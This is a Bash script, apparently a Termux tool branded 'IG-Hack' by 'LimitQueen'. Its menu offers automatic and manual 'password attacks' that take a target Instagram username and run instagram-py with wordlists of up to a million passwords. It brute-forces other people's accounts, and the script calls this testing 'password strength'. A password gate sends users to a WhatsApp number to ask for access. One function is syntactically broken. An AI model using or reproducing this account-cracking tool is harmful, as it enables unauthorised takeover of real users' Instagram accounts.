#!/bin/bash
#colours
#####3#3#
red='\033[1;31m'
rset='\033[0m'
grn='\033[1;32m'
ylo='\033[1;33m'
blue='\033[1;34m'
cyan='\033[1;36m'
pink='\033[1;35m'
#coding section starts :)
clear
tanya(){
read -p $'$grn SCRIPT INI DI KUNCI MAU MINTA KATA SANDI ? ${pink}y${rset}/${pink}n${rset}' sa
if [[ $sa == y || $sa == ya || $sa == mau ]]; then
xdg-open wa.me/6281212624360?text=roy+sandi+hack+instegrem+apa
else
sandi
fi
}

sandi(){
banner

read -p $'Masukan kata sandi : ' passwo
if [[ $passwo == "janji mau subs" ]]; then
bb
elif [[ $passwo == "lim sky" ]]; then
bb
else
echo -e "$red Kata sandi salah"
sleep 2
sandi
}
banner(){
echo 
echo '
    ██╗ ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
    ██║██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
    ██║██║  ███╗█████╗███████║███████║██║     █████╔╝ 
    ██║██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ 
    ██║╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
    ╚═╝ ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝
' | lolcat
echo '
	██     ██ ██▄   ▄██ ██ ████████               
	██     ▄▄ ██▀█▄█▀██ ▄▄    ██  ╔═╗   ╔═╔═        
	██     ██ ██  ▀  ██ ██    ██  ╚═╣╣ ╣╠═╠═╔═╗        
	██████ ██ ██     ██ ██    ██    ╚╚═╝╚═╚═╣ ╣
	╔══════════════════════════════════════════════╗
	Code By LimitQueen                                            
	Github : https://github.com/LimitQueenProject
	YOuTube : Limit Queen Project
	╚══════════════════════════════════════════════╝

' | lolcat
}
menu(){
printf "\n"
printf "  \e[100m\e[1;77m >>  Youtube Channel : \e[1;96m youtube.com/c/limitqueenproject \e[100m\e[1;77m << \e[0m\n"
printf "\n"
echo 

printf "\e[1;92m[\e[0m\e[1;77m1\e[0m\e[1;92m]\e[0m\e[1;93m Auto Attack\e[0m\n"
printf "\e[1;92m[\e[0m\e[1;77m2\e[0m\e[1;92m]\e[0m\e[1;93m Manual Attack\e[0m\n"
printf "\e[1;92m[\e[0m\e[1;77m3\e[0m\e[1;92m]\e[0m\e[1;93m About LimitQueen\e[0m\n"
printf "\e[1;92m[\e[0m\e[1;77m4\e[0m\e[1;92m]\e[0m\e[1;93m Update Script\e[0m\n"
printf "\e[1;92m[\e[0m\e[1;77m5\e[0m\e[1;92m]\e[0m\e[1;93m Exit\e[0m\n"
read -p $'\n\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Choose an option: \e[0m' option


if [[ $option == 1 || $option == 01 ]]; then
pilihan1
elif [[ $option == 2 || $option == 02 ]]; then
pilihan2
elif [[ $option == 3 || $option == 03 ]]; then
pilihan3
elif [[ $option == 4 || $option == 04 ]]; then
pilihan4
elif [[ $option == 5 ]]; then
exit 1
else
echo
printf "\e[1;93m [>!<] Invalid Selection!\e[0m\n"
printf "\e[1;93m Pilih Yang ada aja sayang\e[0m"
sleep 1
echo
fi
exit
}

pilihan1(){
#wordlist selection.
grn='\033[1;32m'
red='\033[1;31m'
rset='\033[0m'
ylo='\033[1;33m'
#!/bin/bash
#coding section starts :)
clear
echo
echo '
    ██╗ ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
    ██║██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
    ██║██║  ███╗█████╗███████║███████║██║V1.0 █████╔╝
    ██║██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗
    ██║╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
    ╚═╝ ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝
              [#] Auto Password Attack [#]
' |lolcat
printf "\n"
printf "                \e[101m\e[1;77m  >>  Script By LimitQueen << \e[0m\n"
printf "\n"
printf "  \e[100m\e[1;77m >>  Youtube Channel : \e[1;96m youtube.com/limitqueenproject \e[100m\e[1;77m << \e[0m\n"
printf "\n"
echo
read -p $'\033[1;33m[\033[0m#\033[1;33m]\033[1;32m User Name Target :\e[0m ' usrnm
echo
echo -e "
	$grn[+]$red Type$ylo 1$red FOR 1k Passwords$grn
	[+]$red Type$ylo 2$red FOR 10K Passwords$grn	
	[+]$red Type$ylo 3$red FOR 1Million Passwords $grn
	[+]$red Type$ylo 4$red Generate Wordlist"
echo
read -p "[#] Enter Selected Number: " marks
echo 
if [ $marks = 1 ]
then
    instagram-py --username $usrnm --password-list $HOME/instahacking/pass/pass1.txt 
 
elif [ $marks = 2 ]
then
    instagram-py --username $usrnm --password-list $HOME/instahacking/pass/pass2.txt
 
elif [ $marks = 3 ]
then
    instagram-py --username $usrnm --password-list $HOME/instahacking/pass/pass3.txt
else
echo
echo -e  "$ylo >>> exiting........! Bye Bye :) <<<$rset"
echo
sleep 1.0
cd $HOME
fi
sleep 10.0
cd $HOME/instahacking
bash instacracker
}

pilihan2(){
#wordlist selection
grn='\033[1;32m'
red='\033[1;31m'
rset='\033[0m'
ylo='\033[1;33m'
#!/bin/bash
#coding section starts :)
clear
echo
echo '
    ██╗ ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
    ██║██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
    ██║██║  ███╗█████╗███████║███████║██║V1.0 █████╔╝
    ██║██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗
    ██║╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
    ╚═╝ ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝
              [#] Manual Password Attack [#]
' |lolcat
printf "\n"
printf "                \e[101m\e[1;77m  >>  Script By LimitQueen << \e[0m\n"
printf "\n"
printf "  \e[100m\e[1;77m >>  Youtube Channel : \e[1;96m youtube.com/limitqueenproject \e[100m\e[1;77m << \e[0m\n"
printf "\n"
echo
read -p "[#] User Name : " usrnm
echo
read -p "[#] Enter Passlist Location : " inspass
echo
if [ $inspass = 0 ]                                             
then
echo -e  "$ylo >>> exiting........! Bye Bye :) <<<$rset"        
else
instagram-py --username $usrnm --password-list $inspass
echo
sleep 30.0
cd $HOME
fi
sleep 30.0
cd $HOME/instahacking
bash instacracker
}

pilihan3(){
clear
echo '                    
            __   __     _____   __       __       _____    
           /\_\ /_/\  /\_____\ /\_\     /\_\     ) ___ (   
          ( ( (_) ) )( (_____/( ( (    ( ( (    / /\_/\ \  
           \ \___/ /  \ \__\   \ \_\    \ \_\  / /_/ (_\ \ 
           / / _ \ \  / /__/_  / / /__  / / /__\ \ )_/ / / 
          ( (_( )_) )( (_____\( (_____(( (_____(\ \/_\/ /  
           \/_/ \_\/  \/_____/ \/_____/ \/_____/ )_____(   
                                                 
' | lolcat
echo " "
echo "                             About"|lolcat
echo " "
echo "       🙏 Hey, there I am Roy Aziz Barera (LimitQueen), i made this tool
  to penetrate password strength In termux, so i hope guys you
                             liked it. 😘"
echo ""
echo "                  Our channel :- LimtiQueenProject"| lolcat
echo " "

sleep 5.0
cd $HOME/instahacking
bash instacracker

}

pilihan4(){
#colour section
red='\033[1;31m'
rset='\033[0m'
grn='\033[1;32m'
ylo='\033[1;33m'
#script coding starts
clear
echo " "
echo " "
echo '
                  _  _  ___  ___   __  ____  ___ 
                 ( )( )(  ,\(   \ (  )(_  _)(  _)
                  )()(  ) _/ ) ) )/__\  )(   ) _)
                  \__/ (_)  (___/(_)(_)(__) (___) v 1.0
'|lolcat
echo " "
echo " "
sleep 6.0
clear
echo -e "$red                         ChEcKiNg..>$rset"
sleep 2.0
clear
echo -e "$red                         ChEcKiNg...>$rset"
sleep 2.0
clear
echo -e "$red                         ChEcKiNg....>$rset"
sleep 2.0
clear
echo -e "$red                         ChEcKiNg.....>$rset"
sleep 2.0
clear
echo " "
echo " "
echo -e "$grn                updating the IgHack please wait$rset"
sleep 2.0
git pull origin master
echo " "
echo -e "$grn               IgHack has been updated check it now...$rset"
sleep 3.0
echo " "
bash instacracker
clear
sleep 1.0

}
bb(){
banner
menu
}
#banner
#tanya
#bbnya hapus
bb
